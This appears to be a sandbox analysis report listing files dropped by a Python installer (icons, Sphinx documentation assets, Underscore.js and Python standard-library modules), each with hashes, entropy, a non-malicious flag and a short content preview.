                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;([..[...U...@l...-!a...@.....IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):695
                                                                                                                                Entropy (8bit):7.472596258888605
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:6v/78f2s/6Tv06F0lqJrtIJJlKLxbZiOO4/xtjNvMuqfrMvmqDBIE3AuzWm2ID:Z2s/6Tn00lt07OO4/xvMuqfe/7J2ID
                                                                                                                                MD5:A721FC7EC672275E257BBBFDE49A4D4E
                                                                                                                                SHA1:88D4484552C4BEAC33D9A0848F523AAA66AAD78C
                                                                                                                                SHA-256:AE173DC4842351FC1C8A551AFBDB58CB2B295490782130DAA4F359A6A80D7256
                                                                                                                                SHA-512:7879A2953ACC3762C9ED55A19357BA12AD0B8BDB4E08DA9E3F21CB2853A481F8B1B4665FD03FB6F932F50450594193224CEEC10FE464B31936416E6584AEE9CD
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR................a....sRGB.........bKGD..............pHYs.................tIME.....8!.3'^...7IDAT8.e.OHUA...{.w{"....&hS.6.Z...mB*xP..MQ...A. ".)mZH... F.EF......2.....y3g........;.7..]....3i.s.v.M.....U.....}..\...x'.G.j.N,.Z.X.wQ....1 *.{.8k9.g.'v;..;.j./.t?|..[{\...N..j.E.%g..J=M}.W.....}x..v.^.{..Tn.J...N....\}..X.n..zw/..umY5;mg....Q."..SQ.}..,./.|..i...'}..S...@.B.................Wk..)`..j'..J/N.K@...e1M..FN,j}yhb.wp..+..K.S..Xb....@.:........_.=mU.5.EqR.'.4I.N.&t:..c.....j..l.....`zF..6..gu.G.f.pm".......J..(p..o.....q.G.0."....n...:".,.%8...4...+!..`..DoY-...4..,..5.3.......gob.;..3c..]..I...i...C....h.\nf]..................IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2041
                                                                                                                                Entropy (8bit):4.73858862289631
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rnv4jncfrUrlwFiQy1t/LErdcLpqBpI14P+pz9Y9zcLG6HtSYhLAHt67:I4ASvUSS4Bi14PPe9AW
                                                                                                                                MD5:0AC021A9F4CAE16DF1939CC056AEA75B
                                                                                                                                SHA1:7AB79AB732C9EAC4421A2CE0628E6C09155E5CB2
                                                                                                                                SHA-256:5865BE8BCC0AF888594903EA0112F6C8D923C5726C4081E8C856110CC7339CEF
                                                                                                                                SHA-512:C64D320499DCAE4D3D94ED34FBB741A0335761726276F7FE07D6AD1971742F5F2F3DA25CABBA8A63A7B7BB6CF9CAC9AF71B902CEB03644D2BEE84A24ECFE23E5
                                                                                                                                Malicious:false
                                                                                                                                Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M7.90472 0.00013087C7.24498 0.00316295 6.61493 0.0588153 6.06056 0.15584C4.42744 0.441207 4.13093 1.0385 4.13093 2.14002V3.59479H7.99018V4.07971H4.13093H2.68259C1.56098 4.07971 0.578874 4.7465 0.271682 6.01495C-0.0826595 7.4689 -0.0983765 8.37618 0.271682 9.89434C0.546011 11.0244 1.20115 11.8296 2.32275 11.8296H3.64965V10.0856C3.64965 8.82574 4.75178 7.71441 6.06056 7.71441H9.91531C10.9883 7.71441 11.8449 6.84056 11.8449 5.77472V2.14002C11.8449 1.10556 10.9626 0.328486 9.91531 0.15584C9.25235 0.046687 8.56447 -0.00290121 7.90472 0.00013087ZM5.81767 1.17017C6.2163 1.17017 6.54184 1.49742 6.54184 1.89978C6.54184 2.30072 6.2163 2.62494 5.81767 2.62494C5.41761 2.62494 5.0935 2.30072 5.0935 1.89978C5.0935 1.49742 5.41761 1.17017 5.81767 1.17017Z" fill="url(#paint0_linear)"/>.<path d="M12.3262 4.07971V5.77472C12.3262 7.08883 11.1998 8.19488 9.9153 8.19488H6.06055C5.00466 8.19488 4.13092 9
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10634
                                                                                                                                Entropy (8bit):4.567648205766356
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:II/rLJBcFt3LRtFjLrmc2bz6sydW1DcEcpCMr16vzoR7Hl6t8TkjZgabLpeHBtLF:t/3JBcF/tFjLrmc2bz6RTzb6sbyg+F6N
                                                                                                                                MD5:165B592E794218726B1EC15D4E3E9EB1
                                                                                                                                SHA1:610A001894DECCF70DF1DD756DDC9E5EF49E8C04
                                                                                                                                SHA-256:0E2D097EC6582B8A0E035A7630AD3052BBB189F3ABEC9CB29822CD92D9ED86AB
                                                                                                                                SHA-512:0048B85E312061C83D84480F3778B1970519B0D54BFFBEFC24244DAD8FE422FA4DCB4ED8C093B8F59B217965F1955A0EF16229F8849CC96ACF3242507765340E
                                                                                                                                Malicious:false
                                                                                                                                Preview:@import url("default.css");..body {. background-color: white;. margin-left: 1em;. margin-right: 1em;.}...mobile-nav,..menu-wrapper {. display: none;.}..div.related {. margin-bottom: 1.2em;. padding: 0.5em 0;. border-bottom: 1px solid #ccc;. margin-top: 0.5em;.}..div.related a:hover {. color: #0095C4;.}..div.related ~ div.related {. border-top: 1px solid #ccc;. border-bottom: none;.}...related .switchers {. display: inline-flex;.}...switchers > div {. margin-right: 5px;.}...version_switcher_placeholder,..language_switcher_placeholder {. padding-left: 5px;. background-color: white;.}...inline-search {. display: inline;.}.form.inline-search input {. display: inline;.}.form.inline-search input[type="submit"] {. width: 40px;.}..div.document {. display: flex;.}..div.sphinxsidebar {. float: none;. position: sticky;. top: 0;. max-height: 100vh;. background-color: #eeeeee;. border-radius: 5px;. line-height: 130%;.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4892
                                                                                                                                Entropy (8bit):5.0714561219032195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:mkxVA1PLTiV2R3FiVAoiVPyiVIiV3iVcsEVyJ/ZJKomQWcv60dbn6hZ7eKnVusw:mkcWV8kVqVBV7VyVcsEV4kFyySeVusw
                                                                                                                                MD5:4C780ADD0283F134C683C19428B539EE
                                                                                                                                SHA1:B1A50DA44005D20D9E2B502A6283807598DA301F
                                                                                                                                SHA-256:B4CE0A3C690B00B06ACCC101A1AFAA38C867BD444C7D3905979874DBB66D069F
                                                                                                                                SHA-512:9273D9BE8A10A8D74A1D81D31B59A9B6444888FBF93232B2C164D74472E2ADA665E2A1522C4FB2850F51DE363428ECDD3467191886C082B9AB7F454BF38EA7C8
                                                                                                                                Malicious:false
                                                                                                                                Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #ffffcc }...highlight { background: #f8f8f8; }...highlight .c { color: #3D7B7B; font-style: italic } /* Comment */...highlight .err { border: 1px solid #FF0000 } /* Error */...highlight .k { color: #008000; font-weight: bold } /* Keyword */...highlight .o { color: #666666 } /* Operator */...highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */...highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */...highlight .cp { color: #9C6500 } /* Comment.Preproc */...h
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16634
                                                                                                                                Entropy (8bit):4.652006329050047
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Ezl6ghsW2yZZY2wE2EDr+KIrGn4GhHtK1KBQo0Rhn2I:e1hs+5PfPZm9
                                                                                                                                MD5:05F73A0168E11448C24FE18115ABEB43
                                                                                                                                SHA1:085C9A1CE909184CAD80EBE894C6EBB3C390CE9A
                                                                                                                                SHA-256:D6B5EE21EDD7B46C029C5111326719DCEC5C5F52368704A93B2D6485CB22414C
                                                                                                                                SHA-512:B57DBF3751EEBDC30FB0657ACC94928B7B027F7741D82CD4E67D0A3B04972ED63946D71B25899743F51F45F441214F74F980606700B0BC701D818525E0D1178D
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*. * searchtools.js. * ~~~~~~~~~~~~~~~~. *. * Sphinx JavaScript utilities for the full-text search.. *. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */..if (!Scorer) {. /**. * Simple result scoring code.. */. var Scorer = {. // Implement the following function to further tweak the score for each result. // The function takes a result array [filename, title, anchor, descr, score]. // and returns the new score.. /*. score: function(result) {. return result[4];. },. */.. // query matches the full name of an object. objNameMatch: 11,. // or matches in the last dotted part of the object name. objPartialMatch: 6,. // Additive scores depending on the priority of the object. objPrio: {0: 15, // used to be importantResults. 1: 5, // used to be objectResults. 2: -5}, // used to be unimportantResults. // Used when the priority is not in the m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4353
                                                                                                                                Entropy (8bit):4.813247295027459
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:F8NJC1UvykJDUTH5kivLkH8vhiV8Rz+vx5VI0/vyv55NuVd2s2kE8A:F8NgeJCHRD+xq/uj2YA
                                                                                                                                MD5:D9D62289B53FDC887C5E50F8D470EBE0
                                                                                                                                SHA1:78840CA3D53A745D697E8506F8A50B931A575592
                                                                                                                                SHA-256:D23C599FC95A194340402CEC351ECC78B946EA27CFF1DA0ECC2B1F8B1A648B1D
                                                                                                                                SHA-512:97B85D1DA0BA4A46D4D22E2A95B57F884C4A8149A798348B2F67C83C509D622CAA28DED35F139268FDB17939E5016C02E673770C9985E5887FC44E37FD2A2000
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*. * sidebar.js. * ~~~~~~~~~~. *. * This script makes the Sphinx sidebar collapsible. This is a slightly. * modified version of Sphinx's own sidebar.js.. *. * .sphinxsidebar contains .sphinxsidebarwrapper. This script adds in. * .sphixsidebar, after .sphinxsidebarwrapper, the #sidebarbutton used to. * collapse and expand the sidebar.. *. * When the sidebar is collapsed the .sphinxsidebarwrapper is hidden and the. * width of the sidebar and the margin-left of the document are decreased.. * When the sidebar is expanded the opposite happens. This script saves a. * per-browser/per-session cookie used to remember the position of the sidebar. * among the pages. Once the browser is closed the cookie is deleted and the. * position reset to the default (expanded).. *. * :copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */..$(function() {. // global elements used by the functions.. // the 'sidebarbutton' element is defined as gl
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):68420
                                                                                                                                Entropy (8bit):4.7888312487578935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:uFgPYMzG1NxVbecjNTUtHAJ3l1rQPYBD9Vf5Cb:TPYMzGDbeUKpAJA+Cb
                                                                                                                                MD5:9EB878EE889F880ACA37CA63E4195AB4
                                                                                                                                SHA1:7202BC60A439A2F82A483F4DE237CE22803EF8E2
                                                                                                                                SHA-256:CC10F799CD0F6B65F95C4012445497E5BA3CB9F51964A9468940B27BDE98B487
                                                                                                                                SHA-512:79C072382C1FDD135D7E10CD5E2E002F76D4D54A7ED85BD45BCBA44E2392902AB1F39E540049FAABDF79E98281953B3D722647B930FEDDC89A4F0AEA98E075BB
                                                                                                                                Malicious:false
                                                                                                                                Preview:(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define('underscore', factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, (function () {. var current = global._;. var exports = global._ = factory();. exports.noConflict = function () { global._ = current; return exports; };. }()));.}(this, (function () {. // Underscore.js 1.13.1. // https://underscorejs.org. // (c) 2009-2021 Jeremy Ashkenas, Julian Gonggrijp, and DocumentCloud and Investigative Reporters & Editors. // Underscore may be freely distributed under the MIT license... // Current version.. var VERSION = '1.13.1';.. // Establish the root object, `window` (`self`) in the browser, `global`. // on the server, or `this` in some virtual machines. We use `self`. // instead of `window` for `WebWorker` support.. var root = typeof self == 'object
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (18996)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19530
                                                                                                                                Entropy (8bit):5.203574242965945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:zeOIhxIEKCfc5uFWT4LRn8jgZOQV72xF7CaNQWB/O9a/RQ0eb:qOI/IE3c5EWT6RcemF7CaNQWm0/RFc
                                                                                                                                MD5:426E8E61DD81D4C6F9C17F1150AD07CE
                                                                                                                                SHA1:BDF0B85756EE2B41FF1E0C86960BF14C740C34CE
                                                                                                                                SHA-256:218FB1C1FC72E9AF6B866F430BE2A67FA376392B4DB2F4DBF32772671B6AE55C
                                                                                                                                SHA-512:66E3A3CAAAB8D3DFAAEAE738F548811777D37B24723FC42CD097FFEC5C47E4B7E1A81333AD1E5CC1BA43038060CD2A3CF38C3AABFFA835D21E1DE9CEAA12121B
                                                                                                                                Malicious:false
                                                                                                                                Preview:!function(n,r){"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,function(){var t=n._,e=n._=r();e.noConflict=function(){return n._=t,e}}())}(this,(function(){.// Underscore.js 1.13.1.// https://underscorejs.org.// (c) 2009-2021 Jeremy Ashkenas, Julian Gonggrijp, and DocumentCloud and Investigative Reporters & Editors.// Underscore may be freely distributed under the MIT license..var n="1.13.1",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},t=Array.prototype,e=Object.prototype,u="undefined"!=typeof Symbol?Symbol.prototype:null,o=t.push,i=t.slice,a=e.toString,f=e.hasOwnProperty,c="undefined"!=typeof ArrayBuffer,l="undefined"!=typeof DataView,s=Array.isArray,p=Object.keys,v=Object.create,h=c&&ArrayBuffer.isView,y=isNaN,d=isFinite,g=!{toString:null}.pro
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6713
                                                                                                                                Entropy (8bit):4.483378403190208
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4mWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kv+0TmnTLikZW9CxbOJbYQ
                                                                                                                                MD5:B877ED65FC102E9E87F108EC68F32DB8
                                                                                                                                SHA1:006B5ED81AD2DBA79F7F201271C5EEDDDEF856F3
                                                                                                                                SHA-256:C01BA83C5602D006EFBF5868D53075CB6997AA069B4B6C6E2C6155CB282D9E0A
                                                                                                                                SHA-512:CA12429B57497AE2BAB8655D6968B962A7237FDF00179509102902D6E118B2748D658C5424A7CAAB8A257DC844427549238A03BA8BF89F4AF0B3629DD8969D53
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35195
                                                                                                                                Entropy (8bit):4.473668543181026
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Ob3TMIq3JRejezqFTTQjJFUT2uXUmwlKjevW7ZigkLmS3V2XpRY:4MHDejezqFvgAT2u/NKvW7dkZlMY
                                                                                                                                MD5:29B0B8756C6385B118FE2DFB14C14E60
                                                                                                                                SHA1:D4B227129C2AC363985958C029A49E262009C968
                                                                                                                                SHA-256:36A33CB62BCE2EEFC61AD2C7C7555407404481A9543F1C366C32CDE3513D8A14
                                                                                                                                SHA-512:72E9E6E6657648214AA3103191350ABD395C9F18632E1AB0B8B288F2F20FCF082866565EEB3423B05E3FCE3009210EA0323417021BE7F8B7AD5CE9F2E26A0EA7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):517
                                                                                                                                Entropy (8bit):5.2580863991460935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                Malicious:false
                                                                                                                                Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):101814
                                                                                                                                Entropy (8bit):4.311553738378426
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:g3gKb2hik3RLsuQCvu7fQEy17udHC91vhAxaGWt:gQKb2hik3aQu7fQEy17udc1vixaG2
                                                                                                                                MD5:AA5ECD43EE07705C19013DF0334CE22D
                                                                                                                                SHA1:220DFDDE6A3FF51D98CB48082B595601F2830E9B
                                                                                                                                SHA-256:692565CD51F72006DE1ED3AC07167DD49D08A7496D6DEFB4A4151A3D97BBE574
                                                                                                                                SHA-512:862658A588C0672B9DBB92BF6BDB6FE3E68A95FA24A6B67F650D90950AA8BA8BAB1D4F7331599CCBB6868386BA1474AFE02ABB39B32718B611268A88BDEA7862
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):62074
                                                                                                                                Entropy (8bit):4.410274312722967
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:pZlWC/yNX9e8T8Y+XqfdANHWiIgliQ1wDl1:pZ8GyNX9aqeNHTIglz181
                                                                                                                                MD5:50B7ECA553612E5F3ABDFC50F8A2EA24
                                                                                                                                SHA1:26029B70AE6793D12F73D967DEE06C278642C9F5
                                                                                                                                SHA-256:D60556B09F3F44DBE7F90E50042713A043C8018272DBB033251D6FB74A2C4021
                                                                                                                                SHA-512:774ACA6FF4B42C90F85351B1A2EA673834B606274DD6C76FA619B106007142293414159F524C5C44F8D1D6A55B97E89B320F751A1BD48592B0C53CADEF137F2C
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11884
                                                                                                                                Entropy (8bit):4.544340291668485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:jrq3jJ1vi4b0/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRtiARG9comK7KzAEyeWdm4
                                                                                                                                MD5:431D5B07A4410B2FD0B0413B508162B9
                                                                                                                                SHA1:9618954026B520987E4AEDD549F2308DA93037DF
                                                                                                                                SHA-256:B6ACD96A45F30949973135F41DB2D992BB7D06A6B6FEFB2E3F12AF4035D3DD76
                                                                                                                                SHA-512:2CB7B565A8156C7A0904C0A045D2CD1B097BA04158EEB9B84F58C0D8814E41E0AB544206DEFC278BBF33DA325FF5EA25A67359BD8049D546CD71E4FB2676D007
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):76247
                                                                                                                                Entropy (8bit):4.294355955171862
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:5D151xBrB8GWHQ0x41J7XLR+SQ8q75AikJJ2Qu3zy2cy:5D1m141J7XLR+F8q75omQu3us
                                                                                                                                MD5:D185635F6A604DF27BB90008701B6ABC
                                                                                                                                SHA1:254E2A9BD3551FCD06D001ABAC1876DD571DB48A
                                                                                                                                SHA-256:17258167E2A46FCE4E1FBF5E07C6DA72169D3022AEA477146F446D68E9227E08
                                                                                                                                SHA-512:D9AA359E26E30BBE9DE5D6A3D442707944782A2FFC55C86E8360078B8CBE65061173A3EC46C9F9F788ADF6F9601FE146FB02C5E8F9117ED65F6B689F4070E986
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Base implementation of event loop.....The event loop can be broken up into a multiplexer (the part..responsible for notifying us of I/O events) and the event loop proper,..which wraps a multiplexer with functionality for scheduling callbacks,..immediately or at a given time in the future.....Whenever a public API takes a callback, subsequent positional..arguments will be passed to the callback if/when it is called. This..avoids the proliferation of trivial lambdas implementing closures...Keyword arguments for the callback are not supported; this is a..conscious design decision, leaving the door open for keyword arguments..to modify the meaning of the API call itself..."""....import collections..import collections.abc..import concurrent.futures..import functools..import heapq..import itertools..import os..import socket..import stat..import subprocess..import threading..import time..import traceback..import sys..import warnings..import weakref....try:.. import ssl..except ImportEr
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2072
                                                                                                                                Entropy (8bit):4.7618893630736645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:yeCRipB7FG3NtCPfOM3TW+yWzpbhTPUXUKyRbb2ubp:ye1euZPzpbp/H2uF
                                                                                                                                MD5:C43FF5138411952C7A12863B1431E489
                                                                                                                                SHA1:A016B8A45BFAB54DC81ECA89F779B94B3A01F61A
                                                                                                                                SHA-256:B7C83C0145384507FADF2B07D0C3EFA170EFA72965DF5A1FB0B7D54E839F2BC2
                                                                                                                                SHA-512:A23424F9FE3ACDBAFEE9FB814426CEB5F3C2BD06086ADE19A23C87806F88CBF0DF69B831877BE740EA58B051A820AD10CE8F1C2AF6D32901B13507DBB30FE3C9
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:__all__ = ()....import reprlib..from _thread import get_ident....from . import format_helpers....# States for Future..._PENDING = 'PENDING'.._CANCELLED = 'CANCELLED'.._FINISHED = 'FINISHED'......def isfuture(obj):.. """Check for a Future..... This returns True when obj is a Future instance or is advertising.. itself as duck-type compatible by setting _asyncio_future_blocking... See comment in Future for more details... """.. return (hasattr(obj.__class__, '_asyncio_future_blocking') and.. obj._asyncio_future_blocking is not None)......def _format_callbacks(cb):.. """helper function for Future.__repr__""".. size = len(cb).. if not size:.. cb = ''.... def format_cb(callback):.. return format_helpers._format_callback_source(callback, ()).... if size == 1:.. cb = format_cb(cb[0][0]).. elif size == 2:.. cb = '{}, {}'.format(format_cb(cb[0][0]), format_cb(cb[1][0])).. elif size > 2:.. cb = '{}, <{} more>, {}
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9128
                                                                                                                                Entropy (8bit):4.251860245095017
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:lszIZ8MLHzG3Brs9pIKrlNtdpnqxfPx1BKV2acfn/CfNrPQh/Km:zZxK3pYplNtdNO7Msn/YPQh/5
                                                                                                                                MD5:19CC5FEA2559B817BF9FCAA3EE4B76B4
                                                                                                                                SHA1:7129D92BA411059492397735E82A2379E813FE46
                                                                                                                                SHA-256:FCD594ABA1912464A80B4C3E4651D5677787395541828A887EA1E0B3A16861FE
                                                                                                                                SHA-512:810F8D8D7B37733F03B19B17F641FBD91CC712C72FEAF657A2521111586DD8130622F3EEABD71EF47CC88D66987AA8E2CA672A2B1393CB0D4901A581D6E9A671
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
